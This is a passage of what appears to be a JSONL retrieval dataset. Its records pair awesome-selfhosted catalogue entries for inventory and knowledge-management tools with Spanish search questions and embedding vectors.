0.07026, -0.06145, -0.00305, -0.0032, 0.01949, 0.05299, -0.09478, 0.04276, -0.04873, 0.00705, -0.04949, 0.13879, -0.01266, 0.01606, 0.0114, -0.01833, 0.0137, -0.04838, -0.01708, -0.02825, 0.03139, 0.00077, 0.01304, 0.02761, -0.00822, -0.06918, -0.05634, 0.04999, 0.04804, -0.00276, 0.00314, -0.06294, -0.01384, -0.01696, -0.01125, 0.0232, -0.00023, 0.00262, 0.00192, 0.03534, 0.02051, 0.01685, -0.0106, -0.00059, -0.02686, 0.06805, 0.01407, -0.07286, -0.05054, -0.00946, 0.00055, -0.00633, -0.0075, 0.08781, 0.02082, 0.02916, 0.05244, -0.01535, 0.04536, 0.01456, 0.02431, 0.01718, 0.05724, -0.01735, 0.01042, 0.02135, 0.03589, 0.02034, -0.01503, 0.03558, 0.00119, -0.0041, 0.03976, 0.00825, 0.07128, -0.01176, -0.02002, 0.00738, 0.03047, -0.08702, 0.00791, -0.05146, -0.03548, -0.02407, 0.00895, -0.01374, 0.0119, -0.01193, -0.01772]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "ΒΏCon quΓ© programa puedo controlar mi stock y repartirlo por varios almacenes fΓ‘cilmente?", "v": [0.07103, 0.19575, -0.10153, -0.07425, 0.01111, -0.07557, 0.11035, 0.00785, -0.24666, -0.18294, -0.08509, -0.03671, 0.03999, -0.08461, 0.1103, 0.0365, -0.04066, -0.10017, 0.04579, 0.04745, 0.01898, -0.12785, -0.05941, -0.04817, 0.01239, -0.00295, 0.09875, -0.01619, -0.10371, -0.06175, -0.01611, -0.03662, 0.11434, -0.06738, 0.03413, -0.04218, 0.08613, 0.11428, 0.12358, 0.02049, 0.00928, -0.05105, -0.04335, -0.08938, 0.10855, 0.01297, 0.05175, -0.0185, -0.04641, -0.04644, -0.02012, -0.05311, -0.03065, -0.00408, 0.02824, -0.02177, -0.03718, 0.06873, 0.05037, -0.02126, 0.05088, -0.00021, 0.11224, -0.02351, -0.05625, 0.01812, -0.06734, -0.05876, -0.13873, 0.01722, -0.13185, -0.00683, -0.01009, 0.0131, -0.03087, -0.02799, -0.0424, 0.01453, 0.05039, -0.06474, -0.06324, -0.05025, 0.04171, 0.02733, -0.01142, -0.08573, -0.1101, -0.04906, -0.04284, -0.03738, -0.06121, -0.10261, 0.00582, 0.07241, -0.00837, -0.03458, 0.07241, 0.10689, -0.0789, 0.06724, 0.017, -0.04716, -0.08682, 0.13648, -0.09699, 0.09759, 0.00626, -0.06353, -0.08025, 0.06714, -0.04435, -0.01641, -0.04696, -0.02574, -0.0432, 0.06083, -0.02353, 0.09629, 0.01263, -0.02705, -0.05008, -0.01072, 0.02103, 0.01596, 0.17165, -0.00274, 0.02654, 0.11696, -0.04441, -0.01241, -0.02941, -0.00294, 0.0274, -0.08574, -0.07459, -0.05149, 0.01261, -0.01962, 0.06609, -0.04367, -0.01328, 0.05079, 0.0564, -0.0199, 0.09155, -0.03922, -0.00551, -0.10049, -0.02051, 0.02427, 0.003, 0.03715, 0.09784, 0.03088, 0.03665, -0.01005, 0.09854, -0.07238, -0.01054, 0.02483, -0.07215, 0.01031, -0.02695, -0.056, 0.05152, -0.07193, -0.02023, 0.00239, 0.0045, 0.07623, -0.07804, 0.10348, 0.04047, -0.01983, -0.0023, -0.07728, 0.03548, -0.11964, 0.00798, -0.05212, -0.03009, 0.0726, 0.07575, 0.01105, 0.03823, -0.00754, -0.05104, 0.09898, 0.01057, 0.01126, 0.02828, 0.05813, 0.03727, -0.1109, -0.0176, 0.01143, 0.02867, 0.00759, 0.01312, 0.01883, 0.0059, 0.00693, 0.06143, 0.00906, 0.08701, 0.06666, -0.04827, 0.05225, 0.02516, 0.08294, 0.04044, -0.02478, 0.13135, 0.03944, -0.05457, 0.04366, -0.02651, 0.03884, 0.02204, -0.04275, 0.05584, 0.02777, 0.07991, 0.05602, -0.03, -0.07196, 0.02975, 0.05997, 0.0654, 0.08638, -0.03003, 0.01944, 0.01655, 0.0044, 0.03031, -0.05056, 0.0002, -0.04309, 0.0063, -0.02006, 0.00926, 0.09146, 0.01805, -0.06534, -0.03758, -0.04053, -0.09421, 0.03086, -0.08997, 0.00063, -0.00949, 0.0297, 0.02341, -0.07742, -0.04763, -0.01333]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Cannery β€” Firearm and ammunition tracker app [AGPL-3.0, Docker]. DVinyl β€” Modern collection manager for physical media (vinyls, CDs, cassettes, books, movies, and video games) [⚠, MIT, Nodejs/Docker]. HomeBox (SysAdminsMedia) β€” Inventory and organization system built for the home user [AGPL-3.0, Docker/Go]. Inventaire β€” Collaborative resources mapper project, while yet only focused on exploring books mapping with wikidata and ISBNs [AGPL-3.0, Nodejs]. Inventree β€” Inventory management system which provides intuitive parts management and stock control [MIT, Python]. Open QuarterMaster β€” Powerful inventory management system, designed to be flexible and scalable [GPL-3.0, deb/Docker]. Part-DB β€” Inventory management system for your electronic components [AGPL-3.0, Docker/PHP/Nodejs]. Shelf β€” Asset and equipment tracking software used by teams who value clarity. Shelf is an asset database and QR asset label generator that lets you create, manage and overview your assets across locations. Unlimited assets, free forever [AGPL-3.0, Nodejs].", "indexar": "ΒΏQuΓ© aplicaciΓ³n sirve para rastrear activos de equipo y generar etiquetas QR?", "v": [0.02986, -0.01085, -0.03862, -0.22035, 0.21442, -0.19983, 0.00806, 0.04423, 0.06188, -0.08344, -0.11927, -0.15698, -0.06564, 0.06064, 0.21125, 0.05301, 0.02746, -0.04114, 0.04885, 0.07139, 0.01678, -0.00186, -0.05667, -0.06474, -0.11593, 0.10993, -0.01634, -0.01696, -0.11678, 0.03045, 0.00828, 0.10457, 0.08587, -0.0463, -0.08061, -0.06446, 0.07525, -0.01681, 0.00038, 0.07869, 0.02025, -0.02969, -0.08986, -0.03303, 0.07231, 0.10057, 6e-05, -0.01847, -0.0118, 0.06534, -0.0848, 0.03254, -0.03386, 0.00071, -0.05794, -0.00835, 0.11664, -0.1338, 0.03145, -0.06769, -0.08048, -0.09407, 0.03432, -0.05716, 0.00594, -0.11311, 0.05421, 0.09091, -0.09185, -0.05992, -0.09953, 0.10661, 0.08321, 0.05236, 0.0554, 0.0464, 0.01048, -0.06707, 0.05421, 0.15639, 0.06802, -0.03705, -0.09233, 0.03944, 0.04713, -0.04912, 0.09198, -0.02997, 0.06877, -0.15338, -0.00236, 0.00932, -0.02875, 0.04642, -0.06282, 0.05305, 0.02304, 0.04595, 0.08775, 0.097, -0.04086, -0.09753, -0.03897, -0.01663, 0.0309, 0.06011, 0.03725, -0.06948, 0.00206, 0.00674, 0.07301, -0.18781, -0.08055, 0.09306, 0.03795, 0.09462, -0.00148, -0.03851, -0.01784, 0.02668, -0.00868, -0.00099, -0.01134, -0.0539, 0.0124, -0.05454, 0.01731, 0.07725, -0.01548, 0.06477, -0.05805, -0.01656, -0.07125, 0.02535, -0.15739, -0.0278, 0.07752, 0.05455, -0.06273, 0.01024, 0.02795, 0.02409, -0.01194, -0.01073, 0.02911, 0.00929, 0.08597, -0.01817, -0.0439, 0.09929, 0.0517, -0.03976, -0.08274, -0.01111, -0.06303, -0.01643, 0.04402, -0.06666, -0.04378, 0.00662, -0.04894, -0.0221, -0.07346, 0.00983, 0.00759, 0.01251, 0.02967, -0.04156, 0.06095, 0.04509, -0.02865, 0.02163, 0.00935, -0.10068, 0.06275, -0.01475, 0.04031, 0.00884, 0.05579, -0.07255, -0.04137, -0.06813, 0.09718, 0.02513, 0.0772, 0.00796, 0.06259, 0.02917, -0.0371, 0.0445, -0.00706, 0.01499, -0.01937, -0.06231, -0.00426, -0.02576, 0.04133, -0.02833, -0.00557, -0.01363, 0.04673, -0.06092, 0.01485, 0.04357, 0.03692, 0.025, -0.02623, 0.0702, -0.03679, 0.01639, 0.02579, 0.04065, 0.07297, 0.03198, -0.06421, -0.02653, -0.01845, 0.04909, 0.02272, 0.02202, -0.00582, -0.00061, 0.0081, -0.02065, 0.08155, 0.03476, 0.03139, 0.01858, -0.02694, -0.0317, 0.04212, -0.02857, -0.02819, -0.00149, 0.00316, 0.02172, 0.00415, 0.0189, -0.00925, -0.02838, -0.00142, -0.00687, -0.00032, 0.0049, -0.04952, -0.00557, 0.00789, 0.03008, -0.04501, -0.08516, -0.0093, -0.02059, 0.08318, 0.0378, 0.06422, -0.02716]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "que programa sirve para controlar el inventario de rollos de filamento para impresora 3D?", "v": [0.27211, -0.12908, -0.15749, -0.15817, 0.12531, -0.12317, 0.04594, 0.00149, -0.05849, -0.04701, 0.01693, -0.12288, 0.07812, -0.18147, -0.02326, -0.03662, -0.0553, -0.19711, 0.00206, 0.03583, -0.07372, 0.05046, -0.0815, -0.08059, -0.07937, 0.13785, -0.04713, 0.02378, -0.17566, 0.03647, 0.04173, -0.02638, 0.13002, -0.09269, -0.10742, -0.07355, -0.05746, 0.0376, 0.0242, 0.12235, 0.04328, 0.08664, -0.07172, 0.00357, 0.05662, -0.03741, 0.12671, 0.07006, -0.03412, 0.11471, -0.05043, -0.02592, 0.06517, 0.12293, 0.06242, -0.0749, -0.00546, -0.02376, -0.01992, 0.07548, 0.04033, -0.11353, 0.0318, -0.02343, -0.15043, -0.08463, -0.02063, -0.04252, 0.01666, -0.01976, -0.06987, -0.05161, 0.0588, -0.05532, -0.0431, -0.04365, -0.07161, 0.01935, 0.03479, -0.01959, -0.06415, -0.0647, 0.06376, -0.02892, 0.03254, -0.10658, 0.00844, -0.02041, -0.09866, -0.02306, 0.00973, 0.01162, -0.00138, -0.01058, 0.07553, 0.01519, 0.013, 0.0873, 0.02281, 0.03855, 0.03897, -0.01933, -0.09017, 0.09308, -0.00525, 0.05622, 0.04823, 0.02122, -0.04534, -0.02442, -0.01915, 0.08523, 0.05553, 0.07941, -0.02365, 0.01498, 0.07856, 0.04173, 0.03783, -0.03122, -0.01087, 0.07096, -0.00248, -0.01305, 0.15486, 0.00372, -0.05561, 0.07512, -0.08472, 0.02154, -0.00935, 0.01773, -0.06102, -0.02599, -0.06425, -0.09281, -0.00172, -0.0199, -0.02698, -0.01916, -0.00494, 0.05105, -0.00024, 0.00793, 0.00581, -0.06747, 0.03028, 0.03141, -0.00431, 0.02575, -0.01703, 0.01527, 0.04248, 0.03929, 0.01334, 0.00054, 0.05674, 0.00435, -0.02458, -0.0081, -0.0623, 0.00581, -0.03102, -0.00999, 0.05971, 0.0108, -0.03934, 0.03728, 0.03752, 0.04081, -0.05573, -0.06601, 0.02824, -0.04655, -0.01915, 0.02398, 0.03579, -0.02651, 0.0359, 0.02612, -0.05496, 0.06922, 0.03786, 0.01992, 0.00347, -0.02659, -0.03414, 0.06063, 0.0796, 0.00493, 0.09418, 0.01487, -0.07183, -0.08299, 0.07881, -0.03926, 0.06495, 0.01927, 0.0499, -0.09033, 0.03971, 0.06769, 0.00247, -0.04403, 0.01818, 0.0811, -0.0231, 0.01461, 0.01212, -0.01089, 0.02723, 0.03752, 0.03013, 0.0054, 0.05582, 0.00623, -0.01902, -0.01867, 0.04412, 0.01145, 0.12014, -0.03983, 0.0197, 0.00325, -0.00536, -0.12053, 0.0389, -0.02718, 0.07893, -0.01301, 0.00157, 0.0882, 0.05912, 0.00173, -0.03149, -0.01595, 0.04757, 0.02772, 0.0265, -0.10457, -0.04298, 0.08634, -0.04525, 0.00281, 0.03315, 0.04363, -0.02361, -0.02229, -0.01906, -0.07623, -0.05236, 0.04632, 0.02348, 0.02449, 0.02411, -0.04133]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "con quΓ© puedo hacer un catΓ‘logo de material para impresiΓ³n 3D sin servidor?", "v": [-0.0442, -0.01084, -0.21432, -0.10852, -0.0736, -0.13624, 0.06291, 0.057, 0.00617, -0.02534, -0.0726, -0.08686, 0.0387, -0.20325, -0.09333, 0.07897, 0.13817, -0.16791, 0.0269, 0.06396, 0.06082, 0.04029, -0.06595, -0.13696, -0.05897, 0.07664, 0.06861, 0.02857, -0.21918, 0.05478, -0.07414, 0.0388, 0.0772, -0.036, -0.05481, -0.10666, 0.00571, 0.17491, -0.05936, 0.05177, 0.05208, 0.04181, -0.07963, 0.04655, -0.01664, -0.01313, 0.06475, 0.02343, -0.02917, 0.0632, -0.08996, -0.07984, -0.08468, 0.03081, 0.00166, -0.07473, 0.06538, -0.08256, 0.11002, -0.01653, -0.01054, 0.01466, -0.03762, -0.05587, -0.06785, -0.00784, -0.07983, 0.00645, -0.01525, -0.05057, -0.06593, -0.1439, -0.0462, -0.14046, 0.00012, -0.01088, -0.06143, -0.00844, 0.00612, 0.05365, -0.00268, 0.08189, 0.01204, -0.04802, 0.0174, -0.05911, 0.0072, -0.02262, 0.04446, -0.14254, 0.08336, -0.00652, -0.11571, 0.00997, 0.05572, -0.04826, 0.05173, -0.00185, -0.02571, 0.02412, -0.06953, 0.0815, -0.03794, -0.01826, 0.02777, 0.03352, -0.00884, -0.0172, -0.00173, -0.03631, 0.02869, 0.06631, -0.05616, 0.04526, -0.0717, -0.11672, 0.08708, 0.05794, 0.0186, 0.08674, 0.01929, -0.04278, 0.00843, -0.02979, 0.13097, -0.011, 0.06748, 0.0268, -0.09615, -0.02075, 0.00515, -0.03072, -0.09012, -0.0917, -0.02674, -0.0358, 0.08157, -0.03641, 0.01149, -0.0432, 0.07364, -0.02025, -0.02797, 0.06386, -0.00281, -0.05396, 0.07555, -0.03712, -0.0783, 0.05726, -0.02863, -0.01722, 0.0416, 0.03658, -0.02316, -0.01985, 0.05016, -0.06217, 0.00127, 0.02266, 0.00254, 0.05806, 0.00972, 0.13267, 0.0298, 0.04032, -0.06195, 0.03152, -0.02984, 0.03074, -0.03382, -0.0582, -0.0187, -0.09175, 0.03005, -0.02544, -0.04275, -0.01957, 0.01075, 0.03269, -0.08975, -0.00209, -0.05081, -0.00136, -0.00559, -0.06121, 0.02021, 0.00064, 0.07495, -0.00584, 0.06352, 0.04907, -0.08915, 0.01799, 0.119, -0.10305, 0.02319, 0.01356, -0.02242, -0.05795, -0.01856, 0.01244, 0.00414, -0.08016, 0.02302, 0.01097, -0.05456, 0.05066, -0.01083, -0.0361, 0.01347, 0.01288, 0.06547, -0.06062, 0.05361, 0.02823, 0.01164, -0.06897, -0.05046, -0.02608, 0.10271, 0.03676, 0.00501, -0.01561, 0.03798, -0.02638, 0.04469, -0.07506, 0.08585, -0.04662, -0.03083, 0.10071, -0.01599, 0.0175, -0.01164, -0.01114, 0.04693, -0.03433, -0.03923, -0.09809, 0.00308, 0.0836, -0.03385, 0.03554, 0.03648, -0.01109, -0.00016, -0.0192, -0.1007, -0.07985, -0.04886, -0.00272, -0.01084, 0.00777, 0.03359, -0.06426]} +{"tipo": "pregunta", "herramienta": "Inventory Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Inventory Management", "tema": "inventory management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Inventory Management: Spoolman β€” Keep track of your inventory of 3D-printer filament spools [MIT, Docker/Python].", "indexar": "existe alguna herramienta gratuita para llevar el control del stock de plΓ‘stico en impresoras?", "v": [0.09762, 0.02604, -0.16388, -0.22594, -0.01007, -0.12638, 0.04545, -0.02912, -0.09259, -0.08547, -0.03055, -0.01287, 0.0857, -0.07122, 0.01761, -0.03239, -0.02708, -0.11048, 0.00165, 0.03773, -0.06135, 0.00625, -0.17238, -0.05696, -0.03774, 0.07445, -0.06224, -0.02794, -0.3347, 0.10518, -0.01179, 0.02656, 0.00142, -0.12114, -0.16108, -0.14166, 0.00804, 0.05013, 0.13205, 0.10108, 0.09016, 0.07561, -0.08036, 0.02039, -0.00252, 0.07297, -0.00737, 0.08488, -0.02269, 0.14317, -0.0415, -0.11544, -0.02524, 0.07539, -0.0255, -0.12492, 0.0464, -0.04835, -0.0441, -0.08002, -0.03302, 0.04121, 0.02116, -0.03172, -0.09864, 0.04429, -0.03987, -0.07757, -0.0967, -0.00766, 0.02349, -0.04895, 0.08553, -0.06428, 0.0253, -0.03731, -0.07594, 0.06279, -0.02244, 0.01481, 0.02411, -0.03496, 0.0066, -0.13004, 0.01004, -0.1032, -0.01564, 0.00431, -0.05269, -0.06604, -0.13613, -0.00954, -0.04353, 0.0751, -0.02588, 0.01555, -0.07248, 0.00016, -0.03309, 0.07467, 0.13124, -0.00314, -0.01511, -0.03565, -0.00831, -0.03564, -0.05422, -0.02465, -0.03928, -0.00615, 0.01941, 0.07268, 0.01138, 0.07837, -0.03556, -0.01995, 0.07171, -0.01784, -0.04677, -0.08711, 0.04508, 0.07991, -0.01301, -0.0288, 0.07636, 0.01424, -0.03319, 0.12036, -0.06394, -0.10414, -0.00887, -0.05066, -0.02239, -0.05189, 0.00815, -0.04502, 0.00807, -0.10874, 0.007, -0.04932, -0.02199, 0.03987, 0.0012, -0.03404, -0.00739, -0.07557, -0.02733, 0.05982, -0.07627, 0.01256, -0.05655, -0.00245, 0.08332, 0.05544, 0.05135, 0.05723, -0.01419, -0.0144, -0.00773, -0.047, -0.09609, -0.03165, 0.01425, 0.01802, -0.01329, 0.01218, -0.00056, -0.01485, -0.01504, 0.06348, -0.02586, 0.02714, 0.09765, -0.02133, -0.00862, -0.06231, 0.00646, -0.02669, 0.00667, -0.13146, 0.04124, 0.10176, -0.03417, -0.0267, -0.00195, -0.03866, -0.0129, 0.04264, 0.04977, 0.02758, 0.08304, -0.04195, -0.02545, -0.06978, 0.02699, -0.00911, 0.03169, -0.02007, 0.0112, -0.00689, -0.03521, 0.03709, -0.01115, -0.02016, 0.03791, 0.07178, -0.02817, 0.01494, -0.05112, 0.01441, 0.00753, 0.05271, -0.03258, -0.0281, -0.00246, 0.00411, -0.02185, -0.01689, 0.04223, -0.03384, 0.1039, -0.05986, 0.0803, 0.02195, 0.02186, -0.00292, 0.0497, 0.02278, 0.03626, 0.00621, 0.00664, 0.11804, 0.02091, -0.00847, 0.02495, 0.00815, 0.05341, 0.00141, 0.01024, -0.05232, -0.0267, 0.04486, -0.00645, 0.01738, -0.06008, -0.0243, -0.0463, -0.02263, -0.07589, -0.0783, 0.02408, 0.04102, 0.02098, -0.00412, -0.0088, -0.02855]} +{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode [AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "que programa de gestiΓ³n del conocimiento sirve como alternativa a Notion pero que funcione en mi servidor?", "v": [-0.03618, 0.08812, -0.22984, -0.17395, 0.04306, -0.1587, -0.01895, -0.09988, -0.09282, -0.07347, -0.01334, -0.08757, 0.0636, -0.04538, 0.06086, -0.00991, 0.2018, -0.15039, 0.02637, 0.11609, -0.08013, 0.03827, 0.0756, 0.01031, -0.09981, 0.02532, 0.02149, -0.08152, -0.02695, 0.02241, 0.05134, -0.03578, 0.09542, -0.13004, 0.0465, 0.00372, -0.0089, 0.08466, -0.04627, 0.00099, 0.00098, -0.02675, -0.0157, 0.07991, -0.01569, -0.0513, 0.02431, -0.08504, 0.04911, 0.06283, -0.12531, -0.06348, -0.08279, -0.00621, 0.00477, -0.00854, 0.01986, -0.13293, 0.03026, -0.01867, -0.09859, -0.06531, 0.02513, -0.11238, 0.15675, 0.00703, 0.0369, -0.03687, -0.08249, 0.02869, -0.12567, 0.05519, -0.00278, -0.0814, 0.00996, 0.03133, 0.03374, 0.07275, 0.01656, -0.02951, 0.04931, 0.01519, -0.02533, 0.08208, -0.09051, -0.06024, 0.03597, -0.09935, 0.02585, 0.02104, -0.03259, 0.05651, -0.08006, 0.11788, 0.02935, -0.00457, 0.14251, -0.01626, 0.05889, 0.04739, 0.13225, 0.02078, -0.06774, 0.05028, 0.0048, 0.13865, 0.15445, -0.09983, 0.02088, 0.08429, 0.02854, -0.01266, -0.06732, -0.0444, -0.10321, -0.0186, -0.01605, 0.00537, 0.00443, 0.02267, -0.15845, -0.02462, 0.01077, 0.0024, 0.09707, -0.0249, 0.02917, 0.06165, 0.03324, 0.00584, -0.00321, -0.05226, -0.04781, -0.03216, -0.04413, -0.00842, 0.06107, 0.03901, 0.00964, -0.08488, 0.02029, 0.08241, 0.00264, 0.0135, 0.03235, -0.04797, 0.11886, -0.078, 0.00615, 0.02812, -0.00903, -0.09594, -0.02281, 0.10195, -0.12536, -0.01189, 0.0231, -0.04447, -0.07032, 0.10191, -0.05246, -0.01219, 0.02665, 0.06223, 0.00643, -0.00043, -0.00194, 0.03126, 0.0621, 0.07443, -0.05592, 0.07157, -0.02407, -0.087, 0.0082, -0.05594, -0.06654, -0.07017, 0.08563, 0.01949, -0.04217, 0.02969, -0.0343, 0.04533, -0.03067, -0.04858, -0.06858, 0.0238, -0.04594, 0.00897, 0.04864, -0.02799, -0.04863, -0.04102, -0.02303, -0.04611, -0.00496, -0.06971, -0.00647, -0.00745, -0.0546, 0.00368, -0.00291, -0.02985, -0.0101, 0.04129, -0.02379, 0.04534, 0.051, 0.07438, 0.01148, -0.02594, 0.10857, -0.0039, -0.02522, -0.03466, 0.07367, -0.01008, 0.02481, -0.01585, 0.0308, 0.00567, -0.00918, 0.04623, 0.02811, -0.0275, 0.02575, 0.03693, 0.04909, 0.00872, -0.0304, -0.01364, -0.01132, -0.00829, 0.00827, -0.02749, 0.00132, -0.02617, -0.07399, -0.12017, 0.01239, 0.09402, -0.00605, -0.08969, -0.00279, -0.03258, -0.05253, 0.00241, -0.00878, -0.01646, -0.04578, 0.00812, 0.00639, -0.01153, 0.04998, -0.0036]} +{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode [AGPL-3.0, Docker]. SiYuan β€” A privacy-first personal knowledge management software, written in typescript and golang [AGPL-3.0, Docker/Go]. TeamMapper β€” Host and create your own mindmaps. Share your mindmap sessions with your team and collaborate live on mindmaps [MIT, Docker/Nodejs].", "indexar": "con quΓ© puedo montar una base de datos de conocimientos que sea rΓ‘pida y no dependa de nada externo?", "v": [-0.15794, 0.18019, -0.2467, -0.04587, -0.10746, 0.00846, -0.07128, -0.00639, -0.21239, -0.08582, -0.02798, -0.08542, -0.01126, -0.1054, 0.01984, 0.0719, 0.09114, -0.06579, 0.04065, -0.0284, -0.0347, -0.19086, 0.02431, -0.0258, -0.08973, 0.01431, 0.03185, 0.05294, -0.13046, 0.06, 0.00899, 0.03917, -0.00661, 0.04164, -0.0495, 0.01906, 0.09853, -0.03515, -0.07093, -0.12109, -0.0305, -0.07604, 0.04378, 0.07218, 0.06698, -0.00755, -0.124, -0.03462, 0.04452, -0.04302, 0.06724, 0.00075, -0.06438, -0.1121, -0.0979, -0.12409, 0.16149, -0.04864, 0.08863, 0.02572, -0.02925, 0.14405, -0.04574, 0.07133, 0.01551, 0.0056, 0.0794, 0.04225, -0.04496, 0.03376, -0.00567, -0.05378, -0.00921, -0.07863, 0.00709, 0.0075, 0.0159, 0.10808, 0.06994, 0.00721, -0.06871, 0.05042, -0.06909, -0.01251, -0.00665, -0.02703, 0.00502, -0.04712, 0.03842, -0.00984, 0.03862, 0.15056, -0.07032, -0.01529, -0.01971, -0.01334, 0.00724, 0.04564, -0.07987, 0.03709, -0.04923, 0.05318, -0.04018, 0.11939, 0.12135, 0.01944, 0.07294, -0.02159, -0.00842, 0.02662, -0.03828, 0.02718, -0.1009, -0.02157, -0.03039, -0.13298, -0.04019, 0.00026, -0.10003, 0.06335, -0.01255, -0.0489, 0.0834, 0.02562, -0.02176, -0.05827, 0.01055, 0.11044, 0.01438, 0.07541, 0.00869, -0.05943, -0.04909, -0.03695, 0.13311, 0.08439, -0.07211, -0.05891, -0.02205, -0.10556, -0.03247, 0.02097, -0.0549, -0.02551, -0.04125, -0.02352, 0.04281, 0.03633, -0.00269, -0.06992, -0.04635, 0.08955, 0.05046, 0.04348, -0.09745, -0.06355, 0.07291, -0.05199, 0.02455, 0.03187, -0.00757, 0.10743, -0.04043, 0.03742, 0.01757, -0.07484, 0.00301, -0.01189, 0.01323, 0.07346, -0.04616, 0.09962, -0.03045, -0.12482, 0.07592, 0.01074, -0.10398, -0.07407, -0.06339, -0.01234, 0.02222, -0.03831, -0.02712, 0.00277, -0.02265, -0.02733, 0.02731, -0.04129, -0.00146, -0.01298, 0.01754, 0.01596, 0.03929, -0.01441, 0.04077, -0.06357, -0.03484, 0.01385, 0.05431, -0.07966, -0.03972, -0.0317, 0.05194, 0.00728, -0.01782, 0.00362, -0.02653, 0.02042, 0.00951, -0.01383, 0.05382, 0.01923, 0.04878, -0.04024, 0.00203, 0.01222, 0.03878, 0.04521, -0.0019, 0.01776, 0.01107, 0.06379, 0.04798, 0.00798, -0.02695, -0.00326, 0.03685, -0.016, 0.06369, 0.00855, -0.00988, -0.03324, -0.02564, -0.07266, 0.03841, -0.00305, -0.0323, -0.03907, -0.01318, -0.02334, 0.03496, 0.05211, -0.02865, -0.07232, 0.00054, -0.00853, -0.09721, 0.0743, 0.00442, -0.06369, -0.07354, -0.05319, -0.00499, -0.03907, 0.01017, -0.01779]} +{"tipo": "pregunta", "herramienta": "Knowledge Management Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Knowledge Management Tools", "tema": "knowledge management tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Knowledge Management Tools: AFFiNE Community Edition β€” Next-gen knowledge base that brings planning, sorting and creating all together. Privacy first, customizable and ready to use (alternative to Notion and Miro) [MIT/AGPL-3.0, Docker]. Atomic Server β€” Knowledge graph database with documents (similar to Notion), tables, search, and a powerful linked data API. Lightweight, very fast and no runtime dependencies [MIT, Docker/Rust]. Digimindmap β€” Create simple mindmaps (documentation in French) [AGPL-3.0, Nodejs/PHP]. LibreKB β€” Web-based knowledge base solution. A simple web app, it runs on pretty much any web server or hosting provider with PHP and MySQL [GPL-3.0, PHP]. memEx β€” Structured personal knowledge base, inspired by zettlekasten and org-mode 